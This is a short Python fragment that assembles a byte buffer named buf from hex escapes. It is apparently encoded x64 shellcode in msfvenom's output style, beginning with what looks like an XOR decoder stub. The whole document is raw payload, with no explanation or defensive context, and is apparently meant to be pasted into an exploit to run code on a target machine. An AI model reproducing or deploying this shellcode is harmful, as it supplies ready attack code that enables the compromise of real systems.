buf =  b""
buf += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d"
buf += b"\x05\xef\xff\xff\xff\x48\xbb\xe3\xdd\xec\xfb\xec"
buf += b"\xe1\xb7\xff\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buf += b"\xff\xe2\xf4\x89\xf4\xb4\x62\x86\xe3\xe8\x95\xe2"
buf += b"\x83\xe3\xfe\xa4\x76\xff\x46\xe1\xdd\xfd\xa7\x2c"
buf += b"\x49\xb7\xf0\xb2\x95\x65\x1d\x86\xf1\xed\x95\xc9"
buf += b"\x85\xe3\xfe\x86\xe2\xe9\xb7\x1c\x13\x86\xda\xb4"
buf += b"\xee\xb2\x8a\x15\xb7\xd7\xa3\x75\xa9\x0c\xd0\x81"
buf += b"\xb4\x82\xd4\x9f\x89\xb7\xac\xab\x54\x0b\xa9\xbb"
buf += b"\xa9\x3e\x19\xec\xd8\xec\xfb\xec\xe1\xb7\xff"
